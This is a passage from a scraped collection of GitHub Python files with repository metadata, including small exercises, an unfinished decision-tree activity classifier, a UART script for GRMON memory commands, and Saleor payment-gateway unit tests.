sAIPlayer.lower() == \"n\":\n bAI = False\n\nbContinue = True # Creates a variable I will use to break the loop\n\nwhile bContinue:\n\n LineBreak() # Inserts a line break to make the program look a bit neater\n \n# Creates a menu of options for the user to choose from\n sUserInput = input(\"\"\"Please choose an option\n 1: A 1 round game\n 2: A best of 3 game\n 3: A best of 5 game\n 4: Please enter a custom number of rounds\n 5: Play an infinite number of rounds (until you say to stop)\n 6: Exit the program\n --> \"\"\")\n\n LineBreak()\n\n# The code below will run the if statements depending on which option the user chose\n if sUserInput == \"1\":\n\n (iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) = RockPaperScissors(1, bAI)\n# Calls the function RockPaperScissors() and gives it the number of rounds to run, if the player is playing against an AI, then unpacks the returned tuple into 2 variables\n Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) \n# Calculate who won using the scores of the players\n\n elif sUserInput == \"2\":\n (iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) = RockPaperScissors(3, bAI)\n Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name)\n\n elif sUserInput == \"3\":\n (iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) = RockPaperScissors(5, bAI)\n Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name)\n\n elif sUserInput == \"4\":\n iNumberOfRounds = int(input(\"Please enter the number of rounds you wish to play: \"))\n# Asks the user to enter the number of rounds to be played, then converts that to a number\n (iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) = RockPaperScissors(iNumberOfRounds, bAI)\n Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name)\n\n elif sUserInput == \"5\":\n (iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name) = RockPaperScissors(\"Infinite\", bAI) # Set the number of rounds to \"Infinite\", which is used to tell this part to loop infinitely\n Results(iPlayer1Score, iPlayer2Score, sPlayer1Name, sPlayer2Name)\n \n elif sUserInput == \"6\":\n bContinue = False # If the user enters \"6\", set bContinue to False, which stops the program\n\n \n \n","repo_name":"JoeHolmes97/Rock-Paper-Scissors","sub_path":"Rock Paper Scissors/Rock_Paper_Scissors.py","file_name":"Rock_Paper_Scissors.py","file_ext":"py","file_size_in_byte":7459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2140426133","text":"\"\"\"Code Fragment 5.10: Python code for performing insertion-sort on a list.\"\"\"\n\n\ndef insertion_sort(A):\n \"\"\"Sort list of comparable elements into nondecreasing order.\"\"\"\n if len(A) > 1:\n for k in range(1, len(A)): # From 1 to n-1.\n cur = A[k] # Current element to be inserted.\n j = k # Find correct index j for current.\n while j > 0 and A[j-1] > cur: # If element before current is greater...\n A[j] = A[j-1] # swap places.\n j -= 1\n A[j] = cur # Cur is now in the right place.\n","repo_name":"awwalm/DSAlgoPy","sub_path":"Goodrich/Chapter5/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"9408214414","text":"import sys\n\ninput = sys.stdin.readline\n\nnum = out = int(input())\n\n\ncount = 0\n\nwhile True:\n ten = num//10\n one = num % 10\n total = ten + one\n count += 1\n num = int(str(num % 10)+str(total % 10))\n if(out == num):\n break\nprint(count)\n","repo_name":"sanghyeonchoi/Algorithm","sub_path":"baekjoon1110.py","file_name":"baekjoon1110.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21526018726","text":"from backend.repositories.base import filter_params_normalize\nimport pytest\n\n\n@pytest.mark.parametrize('filters,expected', [\n (\n {\n \"age\": 10\n },\n {\n 'age': 10\n }\n ),\n (\n {\n 'age__gt': 10\n },\n {\n \"age\": {\"$gt\": 10}\n }\n ),\n (\n {\n 'nbr_of_players__gt': 1,\n 'cost_per_player': 1,\n },\n {\n 'nbr_of_players': {\"$gt\": 1},\n \"cost_per_player\": 1\n }\n )\n])\ndef test_params_normalize_creates_operator_expressions(filters, expected):\n assert filter_params_normalize(filters) == expected\n","repo_name":"ndy40/bball-pickup-game-organiser","sub_path":"test/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32198166109","text":"import algorithmen.nearest_neighbors as nn\nimport numpy as np\nfrom statistics import *\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom misc.sensor import Sensor\nfrom prak4.P9_data import P9Data\nfrom signals.statistics import Statistics\n\n\ndef unique_vals(rows, col):\n return set([row[col] for row in rows])\n\n\ndef is_numeric(value):\n return isinstance(value, int) or isinstance(value, float)\n\n\ngehen_data = pd.read_csv('../../data/17SoSe/2017_Gruppe6_Appelfeller-Krupa/gehen.csv')\n# walking starts not directly. Need to move the series\ngehen_data = gehen_data[gehen_data.Timestamp >= (1492076265800 + 5000)]\n\nhuepfen_data = pd.read_csv('../../data/17SoSe/2017_Gruppe6_Appelfeller-Krupa/huepfen.csv')\nhuepfen_data = huepfen_data[huepfen_data.Timestamp >= (1492076761760 + 3000)]\n\nruhe_data = pd.read_csv('../../data/17SoSe/2017_Gruppe6_Appelfeller-Krupa/ruhe.csv')\n\n# We do not need so many data -> clean up graphs\ngehen_data['Timestamp_normalized'] = Statistics.get_timestamps_normalized(gehen_data['Timestamp'])\ngehen_data = gehen_data[gehen_data.Timestamp_normalized < 12000]\nruhe_data['Timestamp_normalized'] = Statistics.get_timestamps_normalized(ruhe_data['Timestamp'])\nruhe_data = ruhe_data[ruhe_data.Timestamp_normalized < 12000]\n\nhuepfen_data['Timestamp_normalized'] = Statistics.get_timestamps_normalized(huepfen_data['Timestamp'])\nhuepfen_data = huepfen_data[huepfen_data.Timestamp_normalized < 12000]\n\nplt.figure(figsize=(20, 10))\nplt.scatter(ruhe_data['Timestamp_normalized'], ruhe_data['accelX (m/s^2)'], label='ruhe')\nplt.scatter(gehen_data['Timestamp_normalized'], gehen_data['accelX (m/s^2)'], label='gehen')\nplt.scatter(huepfen_data['Timestamp_normalized'], huepfen_data['accelX (m/s^2)'], label='huepfen')\n\ndata_array = []\nsensors = Sensor.get_sensors()\nfeatures = 1 + len(sensors)\n\nwindow_size = 500 # timestamps\nmoving_size = 200\nwindow_count = int(12000 / moving_size)\n\nfor i in range(window_count):\n start = i * moving_size\n end = i * moving_size + window_size\n gehen_range = gehen_data[(gehen_data.Timestamp_normalized >= start)\n & (gehen_data.Timestamp_normalized <= end)]\n ruhe_range = ruhe_data[(ruhe_data.Timestamp_normalized >= start) & (ruhe_data.Timestamp_normalized <= end)]\n huepfen_range = huepfen_data[\n (huepfen_data.Timestamp_normalized >= start) & (huepfen_data.Timestamp_normalized <= end)]\n gehen_range_stddev = Statistics.get_standard_deviation(gehen_range['accelX (m/s^2)'])\n ruhe_range_stddev = Statistics.get_standard_deviation(ruhe_range['accelX (m/s^2)'])\n huepfen_range_stddev = Statistics.get_standard_deviation(huepfen_range['accelX (m/s^2)'])\n ruhe_features = [ruhe_range_stddev]\n gehen_features = [gehen_range_stddev]\n huepfen_features = [huepfen_range_stddev]\n if features > 1:\n for sensor in sensors:\n ruhe_sensor = ruhe_range[ruhe_range['ID'] == sensor.id]\n gehen_sensor = gehen_range[gehen_range['ID'] == sensor.id]\n huepfen_sensor = huepfen_range[huepfen_range['ID'] == sensor.id]\n gehen_features.append(Statistics.get_standard_deviation(gehen_sensor['accelX (m/s^2)']))\n ruhe_features.append(Statistics.get_standard_deviation(ruhe_sensor['accelX (m/s^2)']))\n huepfen_features.append(Statistics.get_standard_deviation(huepfen_sensor['accelX (m/s^2)']))\n data_array.append(P9Data(i, start, end, ruhe_features, gehen_features, huepfen_features))\n\n# Visualisierung\nheader = [\"stdabw\", \"label\"]\n\n\nclass Question:\n\n def __init__(self, column, value):\n self.column = column\n self.value = value\n\n def match(self, example):\n # Compare the feature value in an example to the\n # feature value in this question.\n val = example[self.column]\n if is_numeric(val):\n return val >= self.value\n else:\n return val == self.value\n\n def __repr__(self):\n # Visualisierung\n condition = \"==\"\n if is_numeric(self.value):\n condition = \">=\"\n return \"Ist %s %s %s?\" % (\n header[self.column], condition, str(self.value))\n\n\ndef partition(rows, question):\n true_rows, false_rows = [], []\n for row in rows:\n if question.match(row):\n true_rows.append(row)\n else:\n false_rows.append(row)\n return true_rows, false_rows\n\n\ndef gini(rows):\n counts = 2 # Klassen\n impurity = 1\n for lbl in counts:\n prob_of_lbl = counts[lbl] / float(len(rows))\n impurity -= prob_of_lbl ** 2\n return impurity\n\n\ndef info_gain(left, right, current_uncertainty):\n p = float(len(left)) / (len(left) + len(right))\n return current_uncertainty - p * gini(left) - (1 - p) * gini(right)\n\n\ndef find_best_split(rows):\n best_gain = 0 # keep track of the best information gain\n best_question = None # keep train of the feature / value that produced it\n current_uncertainty = gini(rows)\n n_features = len(rows[0]) - 1 # number of columns\n\n for col in range(n_features): # for each feature\n\n values = set([row[col] for row in rows]) # unique values in the column\n\n for val in values: # for each value\n\n question = Question(col, val)\n\n # try splitting the dataset\n true_rows, false_rows = partition(rows, question)\n\n # Skip this split if it doesn't divide the\n # dataset.\n if len(true_rows) == 0 or len(false_rows) == 0:\n continue\n\n # Calculate the information gain from this split\n gain = info_gain(true_rows, false_rows, current_uncertainty)\n\n if gain > best_gain:\n best_gain, best_question = gain, question\n\n return best_gain, best_question\n\n\nclass Leaf:\n def __init__(self):\n self.predictions = 2\n\n\nclass Decision_Node:\n\n def __init__(self,\n question,\n true_branch,\n false_branch):\n self.question = question\n self.true_branch = true_branch\n self.false_branch = false_branch\n\n\ndef build_tree(rows):\n\n # Try partitioing the dataset on each of the unique attribute,\n # calculate the information gain,\n # and return the question that produces the highest gain.\n gain, question = find_best_split(rows)\n\n # Base case: no further info gain\n # Since we can ask no further questions,\n # we'll return a leaf.\n if gain == 0:\n return Leaf(rows)\n\n # If we reach here, we have found a useful feature / value\n # to partition on.\n true_rows, false_rows = partition(rows, question)\n\n # Recursively build the true branch.\n true_branch = build_tree(true_rows)\n\n # Recursively build the false branch.\n false_branch = build_tree(false_rows)\n\n # Return a Question node.\n # This records the best feature / value to ask at this point,\n # as well as the branches to follow\n # dependingo on the answer.\n return Decision_Node(question, true_branch, false_branch)\n\n\ndef print_tree(node, spacing=\"\"):\n\n # Base case: we've reached a leaf\n if isinstance(node, Leaf):\n print(spacing + \"Predict\", node.predictions)\n return\n\n # Print the question at this node\n print(spacing + str(node.question))\n\n # Call this function recursively on the true branch\n print(spacing + '--> True:')\n print_tree(node.true_branch, spacing + \" \")\n\n # Call this function recursively on the false branch\n print(spacing + '--> False:')\n print_tree(node.false_branch, spacing + \" \")\n\n\ndef classify(row, node):\n \"\"\"See the 'rules of recursion' above.\"\"\"\n\n # Base case: we've reached a leaf\n if isinstance(node, Leaf):\n return node.predictions\n\n # Decide whether to follow the true-branch or the false-branch.\n # Compare the feature / value stored in the node,\n # to the example we're considering.\n if node.question.match(row):\n return classify(row, node.true_branch)\n else:\n return classify(row, node.false_branch)\n\n\ndef print_leaf(counts):\n total = sum(counts.values()) * 1.0\n probs = {}\n for lbl in counts.keys():\n probs[lbl] = str(int(counts[lbl] / total * 100)) + \"%\"\n return probs\n\n\nif __name__ == '__main__':\n\n teach_ratio = 0.4\n teach_train_limit = int(np.round(teach_ratio * len(data_array)))\n\n # Train\n #for x in range(0, teach_train_limit):\n\n data_gehen = np.hstack(gehen_features, )\n\n\n print(gehen_features)\n # my_tree = build_tree(data.gehen_features)\n # my_tree = build_tree(data.ruhe_features)\n # # Test\n # for x in range(teach_train_limit, len(data_array)):\n # data = data_array[x]\n # print(\"Actual: %s. Predicted: %s\" %\n # (x[-1], print_leaf(classify(x, my_tree))))\n #\n # print_tree(my_tree)\n","repo_name":"pipeherra/MachineLearning","sub_path":"src/prak4/P9.py","file_name":"P9.py","file_ext":"py","file_size_in_byte":8791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17716803876","text":"\n#write a program to find the reverse of given integer number\n\nno=int(input(\"Enter the number\"))\ndef rev_no(num):\n rev=0\n while num!=0:\n rev=rev*10+num%10\n num=num//10\n return rev\n\n\nprint(\"The reversd of the given number\",rev_no(no))\n\n\nprint(\"Welcome the changes are made in the developer branch\")\n\ndef hello_msg():\n print(\"Welcome to hello function programming.....\")\n\nhello_msg()\n\n\nprint(\" the changes in gui with updaated one\")","repo_name":"ergokulpatil/int_code","sub_path":"c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40660903419","text":"import sys\nimport os\nimport argparse\nimport serial\nfrom binascii import unhexlify\nimport struct\nimport time\n\n\ndef uart_send(data):\n\tb = ser.write(data)\n\n\ndef send_write_cmd (cmd, addr, data):\n\t#Compose the command\n\tcmd_bytes = cmd+addr+data\t\n\tuart_send(cmd_bytes)\n\ndef send_read_cmd (cmd, addr):\n\t#Compose the command\n\tcmd_bytes = cmd+addr\t\n\tprint (cmd_bytes)\n\tuart_send(cmd_bytes)\n\ts = ser.read(4)\n\tprint(\"SIST port status\", s)\n\n\n# Addapt the input to conver from hex.\n# The number of digits should be pair.\n# Remove 0x from the strings\n# Remove Spaces.\ndef parse_hex(hex_str):\n\ttry:\n\t\traw_hex = hex_str.lstrip(\"0x\")\n\t\thex_bytearray = bytearray.fromhex(hex_str[2:])\n\t\treturn (hex_bytearray)\n\n\texcept ValueError as e:\n\t\tprint (\"Error converting : {}\\n\".format(hex_str))\t\n\ndef parse_cmd(cnt, cmd_file):\n\tif cmd_file.startswith('#') : return\n\n\tif cmd_file.startswith('wmem') :\n\t\tcmd, addr, val = cmd_file.rstrip(\"\\n\").split()\n\t\t#Let build a bayte array from addr and val.\t\t\n\t\tprint(\" {} \\t|\\t {} {} {}\".format(cnt, cmd, addr, val))\n\n\t\tcmd_data = b'\\xC0'\n\t\taddr_data = parse_hex(addr)\n\t\tval_data = parse_hex(val)\n\n\t\t# Debug\n\t\t#print (addr_data)\n\t\t#print (val_data)\n\n\t\tsend_write_cmd (cmd_data, addr_data, val_data)\n\t\t\n\n\tif cmd_file.startswith('mem') :\t\n\t\tcmd, addr = cmd_file.split()\n\t\tprint(\" {} \\t|\\t {} {}\".format(cnt, cmd, addr))\n\t\tcmd_data = b'\\x80'\n\t\taddr_data = parse_hex(addr)\n\t\tsend_read_cmd (cmd_data, addr_data)\n\t\t# Debug\n\t\t#print (addr_data)\t\t\n\nparser = argparse.ArgumentParser(description='Executes the commands of a TCL script wi')\nparser.add_argument('-i', '--interface', required=True, help='Interface to communicate with.')\nparser.add_argument('-s','--script', required=True, help='GRMON script to execute')\n\nargs = vars(parser.parse_args())\n\n\nprint(\"Interface: \", format(args[\"interface\"]))\nprint(\"Script: \", format(args[\"script\"]))\n\n\ntty_port = args[\"interface\"]\ntcl_script = args[\"script\"]\n\ntry:\n\tser = serial.Serial( port=tty_port,\n baudrate=115200,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS\n)\nexcept serial.SerialException as e:\n\tprint (\"Port {} unavailable serial device\", tty_port)\n\tsys.exit()\n\n\nser.isOpen()\nsync_data = b'\\x55\\x55'\nprint (sync_data)\t\nser.write(sync_data)\nprint (\"Port is opened.\")\n\ntime.sleep(0.100)\n\nwith open(tcl_script) as cmd_file:\n\tfor cnt, line in enumerate(cmd_file):\t\t\n\t\tparse_cmd(cnt, line)\n\t\ttime.sleep(0.010)\n\nser.close()\n","repo_name":"jmgomez-IAA/pyGRMON","sub_path":"src/interpret_grmon_batch.py","file_name":"interpret_grmon_batch.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"14874509619","text":"from decimal import Decimal\nfrom unittest.mock import Mock, patch\n\nimport pytest\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.template.loader import get_template\nfrom prices import Money\nfrom saleor.order import OrderEvents, OrderEventsEmails\nfrom saleor.order.views import PAYMENT_TEMPLATE\nfrom saleor.payment import (\n ChargeStatus, PaymentError, TransactionKind, get_payment_gateway)\nfrom saleor.payment.models import Payment\nfrom saleor.payment.utils import (\n clean_authorize, clean_capture, create_payment, create_transaction,\n gateway_authorize, gateway_capture, gateway_get_client_token,\n gateway_refund, gateway_void, get_billing_data, handle_fully_paid_order,\n validate_payment)\n\nNOT_ACTIVE_PAYMENT_ERROR = 'This payment is no longer active.'\nEXAMPLE_ERROR = 'Example dummy error'\n\n\n@pytest.fixture\ndef transaction_data(payment_dummy, settings):\n return {\n 'payment': payment_dummy,\n 'token': 'token',\n 'kind': TransactionKind.CAPTURE,\n 'is_success': True,\n 'amount': Decimal('10.00'),\n 'currency': settings.DEFAULT_CURRENCY,\n 'gateway_response': {\n 'credit_cart': '4321'}}\n\n\n@pytest.fixture\ndef gateway_params():\n return {'secret-key': 'nobodylikesspanishinqusition'}\n\n\n@pytest.fixture\ndef transaction_token():\n return 'transaction-token'\n\n\ndef test_get_billing_data(order):\n assert order.billing_address\n result = get_billing_data(order)\n expected_result = {\n 'billing_first_name': order.billing_address.first_name,\n 'billing_last_name': order.billing_address.last_name,\n 'billing_company_name': order.billing_address.company_name,\n 'billing_address_1': order.billing_address.street_address_1,\n 'billing_address_2': order.billing_address.street_address_2,\n 'billing_city': order.billing_address.city,\n 'billing_postal_code': order.billing_address.postal_code,\n 'billing_country_code': order.billing_address.country.code,\n 'billing_email': order.user_email,\n 'billing_country_area': order.billing_address.country_area}\n assert result == expected_result\n\n order.billing_address = None\n assert get_billing_data(order) == {}\n\n\ndef test_get_payment_gateway_not_allowed_checkout_choice(settings):\n gateway = 'example-gateway'\n settings.CHECKOUT_PAYMENT_GATEWAYS = {}\n with pytest.raises(ValueError):\n get_payment_gateway(gateway)\n\n\ndef test_get_payment_gateway_non_existing_name(settings):\n gateway = 'example-gateway'\n settings.CHECKOUT_PAYMENT_GATEWAYS = {gateway: 'Example gateway'}\n with pytest.raises(ImproperlyConfigured):\n get_payment_gateway(gateway)\n\n\ndef test_get_payment_gateway(settings):\n gateway_name = list(settings.PAYMENT_GATEWAYS.keys())[0]\n gateway = settings.PAYMENT_GATEWAYS[gateway_name]\n gateway_module, gateway_params = get_payment_gateway(gateway_name)\n assert gateway_module.__name__ == gateway['module']\n assert gateway_params == gateway['connection_params']\n\n\n@patch('saleor.order.emails.send_payment_confirmation.delay')\ndef test_handle_fully_paid_order_no_email(\n mock_send_payment_confirmation, order):\n order.user = None\n order.user_email = ''\n\n handle_fully_paid_order(order)\n event = order.events.get()\n assert event.type == OrderEvents.ORDER_FULLY_PAID.value\n assert not mock_send_payment_confirmation.called\n\n\n@patch('saleor.order.emails.send_payment_confirmation.delay')\ndef test_handle_fully_paid_order(mock_send_payment_confirmation, order):\n handle_fully_paid_order(order)\n event_order_paid, event_email_sent = order.events.all()\n assert event_order_paid.type == OrderEvents.ORDER_FULLY_PAID.value\n\n assert event_email_sent.type == OrderEvents.EMAIL_SENT.value\n assert event_email_sent.parameters == {\n 'email': order.get_user_current_email(),\n 'email_type': OrderEventsEmails.PAYMENT.value}\n\n mock_send_payment_confirmation.assert_called_once_with(order.pk)\n\n\ndef test_validate_payment():\n @validate_payment\n def test_function(payment, *args, **kwargs):\n return True\n\n payment = Mock(is_active=True)\n test_function(payment)\n\n non_active_payment = Mock(is_active=False)\n with pytest.raises(PaymentError):\n test_function(non_active_payment)\n\n\ndef test_create_payment(settings):\n data = {'gateway': settings.DUMMY}\n payment = create_payment(**data)\n assert payment.gateway == settings.DUMMY\n\n same_payment = create_payment(**data)\n assert payment == same_payment\n\n\ndef test_create_transaction(transaction_data):\n txn = create_transaction(**transaction_data)\n\n assert txn.payment == transaction_data['payment']\n assert txn.token == transaction_data['token']\n assert txn.kind == transaction_data['kind']\n assert txn.is_success == transaction_data['is_success']\n assert txn.amount == transaction_data['amount']\n assert txn.gateway_response == transaction_data['gateway_response']\n\n same_txn = create_transaction(**transaction_data)\n assert txn == same_txn\n\n\ndef test_create_transaction_no_gateway_response(transaction_data):\n transaction_data.pop('gateway_response')\n txn = create_transaction(**transaction_data)\n assert txn.gateway_response == {}\n\n\ndef test_gateway_get_client_token(settings):\n gateway_name = list(settings.PAYMENT_GATEWAYS.keys())[0]\n gateway = settings.PAYMENT_GATEWAYS[gateway_name]\n module = gateway['module']\n with patch('%s.get_client_token' % module) as transaction_token_mock:\n gateway_get_client_token(gateway_name)\n assert transaction_token_mock.called\n\n\ndef test_gateway_get_client_token_not_allowed_gateway(settings):\n gateway = 'example-gateway'\n settings.CHECKOUT_PAYMENT_GATEWAYS = {}\n with pytest.raises(ValueError):\n gateway_get_client_token(gateway)\n\n\ndef test_gateway_get_client_token_not_existing_gateway(settings):\n gateway = 'example-gateway'\n settings.CHECKOUT_PAYMENT_GATEWAYS = {gateway: 'Example gateway'}\n with pytest.raises(ImproperlyConfigured):\n gateway_get_client_token(gateway)\n\n\n@pytest.mark.parametrize(\n 'func', [gateway_authorize, gateway_capture, gateway_refund, gateway_void])\ndef test_payment_needs_to_be_active_for_any_action(func, payment_dummy):\n payment_dummy.is_active = False\n with pytest.raises(PaymentError) as exc:\n func(payment_dummy, 'token')\n assert exc.value.message == NOT_ACTIVE_PAYMENT_ERROR\n\n\ndef test_gateway_authorize_errors(payment_dummy):\n payment_dummy.charge_status = ChargeStatus.CHARGED\n with pytest.raises(PaymentError) as exc:\n gateway_authorize(payment_dummy, 'payment-token')\n assert exc.value.message == (\n 'Charged transactions cannot be authorized again.')\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_authorize(\n mock_get_payment_gateway, payment_txn_preauth, gateway_params,\n transaction_token):\n payment_token = transaction_token\n txn = payment_txn_preauth.transactions.first()\n payment = payment_txn_preauth\n\n mock_authorize = Mock(return_value=(txn, ''))\n mock_get_payment_gateway.return_value = (\n Mock(authorize=mock_authorize), gateway_params)\n\n gateway_authorize(payment, payment_token)\n mock_get_payment_gateway.assert_called_once_with(payment.gateway)\n mock_authorize.assert_called_once_with(\n payment=payment, payment_token=payment_token, **gateway_params)\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_authorize_failed(\n mock_get_payment_gateway, payment_txn_preauth, gateway_params,\n transaction_token):\n payment_token = transaction_token\n txn = payment_txn_preauth.transactions.first()\n txn.is_success = False\n payment = payment_txn_preauth\n\n mock_authorize = Mock(return_value=(txn, EXAMPLE_ERROR))\n mock_get_payment_gateway.return_value = (\n Mock(authorize=mock_authorize), gateway_params)\n with pytest.raises(PaymentError) as exc:\n gateway_authorize(payment, payment_token)\n assert exc.value.message == EXAMPLE_ERROR\n\n\n@patch('saleor.payment.utils.handle_fully_paid_order')\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_capture(\n mock_get_payment_gateway, mock_handle_fully_paid_order, payment_txn_preauth,\n gateway_params):\n txn = payment_txn_preauth.transactions.first()\n payment = payment_txn_preauth\n assert not payment.captured_amount\n amount = payment.total\n\n mock_capture = Mock(return_value=(txn, ''))\n mock_get_payment_gateway.return_value = (\n Mock(capture=mock_capture), gateway_params)\n\n gateway_capture(payment, amount)\n mock_get_payment_gateway.assert_called_once_with(payment.gateway)\n mock_capture.assert_called_once_with(\n payment=payment, amount=amount, **gateway_params)\n\n payment.refresh_from_db()\n assert payment.charge_status == ChargeStatus.CHARGED\n assert payment.captured_amount == payment.total\n mock_handle_fully_paid_order.assert_called_once_with(payment.order)\n\n\n@patch('saleor.payment.utils.handle_fully_paid_order')\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_capture_partial_capture(\n mock_get_payment_gateway, mock_handle_fully_paid_order, payment_txn_preauth,\n gateway_params, settings):\n payment = payment_txn_preauth\n amount = payment.total * Decimal('0.5')\n txn = payment.transactions.first()\n txn.amount = amount\n txn.currency = settings.DEFAULT_CURRENCY\n\n mock_capture = Mock(return_value=(txn, ''))\n mock_get_payment_gateway.return_value = (\n Mock(capture=mock_capture), gateway_params)\n\n gateway_capture(payment, amount)\n\n payment.refresh_from_db()\n assert payment.charge_status == ChargeStatus.CHARGED\n assert payment.captured_amount == amount\n assert payment.currency == settings.DEFAULT_CURRENCY\n assert not mock_handle_fully_paid_order.called\n\n\n@patch('saleor.payment.utils.handle_fully_paid_order')\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_capture_failed(\n mock_get_payment_gateway, mock_handle_fully_paid_order, payment_txn_preauth,\n gateway_params):\n txn = payment_txn_preauth.transactions.first()\n txn.is_success = False\n\n payment = payment_txn_preauth\n amount = payment.total\n\n mock_capture = Mock(return_value=(txn, EXAMPLE_ERROR))\n mock_get_payment_gateway.return_value = (\n Mock(capture=mock_capture), gateway_params)\n with pytest.raises(PaymentError) as exc:\n gateway_capture(payment, amount)\n assert exc.value.message == EXAMPLE_ERROR\n payment.refresh_from_db()\n assert payment.charge_status == ChargeStatus.NOT_CHARGED\n assert not payment.captured_amount\n assert not mock_handle_fully_paid_order.called\n\n\ndef test_gateway_capture_errors(payment_dummy):\n with pytest.raises(PaymentError) as exc:\n gateway_capture(payment_dummy, Decimal('0'))\n assert exc.value.message == 'Amount should be a positive number.'\n\n payment_dummy.charge_status = ChargeStatus.FULLY_REFUNDED\n with pytest.raises(PaymentError) as exc:\n gateway_capture(payment_dummy, Decimal('10'))\n assert exc.value.message == 'This payment cannot be captured.'\n\n payment_dummy.charge_status = ChargeStatus.NOT_CHARGED\n with pytest.raises(PaymentError) as exc:\n gateway_capture(payment_dummy, Decimal('1000000'))\n assert exc.value.message == (\n 'Unable to capture more than authorized amount.')\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_void(mock_get_payment_gateway, payment_txn_preauth, gateway_params):\n txn = payment_txn_preauth.transactions.first()\n payment = payment_txn_preauth\n assert payment.is_active\n\n mock_void = Mock(return_value=(txn, ''))\n mock_get_payment_gateway.return_value = (Mock(void=mock_void), gateway_params)\n\n gateway_void(payment)\n mock_get_payment_gateway.assert_called_once_with(payment.gateway)\n mock_void.assert_called_once_with(payment=payment, **gateway_params)\n\n payment.refresh_from_db()\n assert payment.is_active == False\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_void_failed(\n mock_get_payment_gateway, payment_txn_preauth, gateway_params):\n txn = payment_txn_preauth.transactions.first()\n txn.is_success = False\n payment = payment_txn_preauth\n\n mock_void = Mock(return_value=(txn, EXAMPLE_ERROR))\n mock_get_payment_gateway.return_value = (Mock(void=mock_void), gateway_params)\n with pytest.raises(PaymentError) as exc:\n gateway_void(payment)\n assert exc.value.message == EXAMPLE_ERROR\n\n payment.refresh_from_db()\n assert payment.is_active\n\n\ndef test_gateway_void_errors(payment_dummy):\n payment_dummy.charge_status = ChargeStatus.CHARGED\n with pytest.raises(PaymentError) as exc:\n gateway_void(payment_dummy)\n exc.value.message == 'Only pre-authorized transactions can be voided.'\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_refund(\n mock_get_payment_gateway, payment_txn_captured, gateway_params):\n txn = payment_txn_captured.transactions.first()\n payment = payment_txn_captured\n amount = payment.total\n\n mock_refund = Mock(return_value=(txn, ''))\n mock_get_payment_gateway.return_value = (\n Mock(refund=mock_refund), gateway_params)\n\n gateway_refund(payment, amount)\n mock_get_payment_gateway.assert_called_once_with(payment.gateway)\n mock_refund.assert_called_once_with(\n payment=payment, amount=amount, **gateway_params)\n\n payment.refresh_from_db()\n assert payment.charge_status == ChargeStatus.FULLY_REFUNDED\n assert not payment.captured_amount\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_refund_partial_refund(\n mock_get_payment_gateway, payment_txn_captured, gateway_params, settings):\n payment = payment_txn_captured\n amount = payment.total * Decimal('0.5')\n txn = payment_txn_captured.transactions.first()\n txn.amount = amount\n txn.currency = settings.DEFAULT_CURRENCY\n\n mock_refund = Mock(return_value=(txn, ''))\n mock_get_payment_gateway.return_value = (\n Mock(refund=mock_refund), gateway_params)\n\n gateway_refund(payment, amount)\n\n payment.refresh_from_db()\n assert payment.charge_status == ChargeStatus.CHARGED\n assert payment.captured_amount == payment.total - amount\n\n\n@patch('saleor.payment.utils.get_payment_gateway')\ndef test_gateway_refund_failed(\n mock_get_payment_gateway, payment_txn_captured, gateway_params, settings):\n txn = payment_txn_captured.transactions.first()\n payment = payment_txn_captured\n captured_before = payment.captured_amount\n txn.is_success = False\n\n mock_refund = Mock(return_value=(txn, EXAMPLE_ERROR))\n mock_get_payment_gateway.return_value = (\n Mock(refund=mock_refund), gateway_params)\n\n with pytest.raises(PaymentError) as exc:\n gateway_refund(payment, Decimal('10.00'))\n exc.value.message == EXAMPLE_ERROR\n payment.refresh_from_db()\n assert payment.captured_amount == captured_before\n\n\ndef test_gateway_refund_errors(payment_txn_captured):\n payment = payment_txn_captured\n with pytest.raises(PaymentError) as exc:\n gateway_refund(payment, Decimal('1000000'))\n assert exc.value.message == 'Cannot refund more than captured'\n\n with pytest.raises(PaymentError) as exc:\n gateway_refund(payment, Decimal('0'))\n assert exc.value.message == 'Amount should be a positive number.'\n\n payment.charge_status = ChargeStatus.NOT_CHARGED\n with pytest.raises(PaymentError) as exc:\n gateway_refund(payment, Decimal('1'))\n assert exc.value.message == 'This payment cannot be refunded.'\n\n\n@pytest.mark.parametrize('gateway_name', 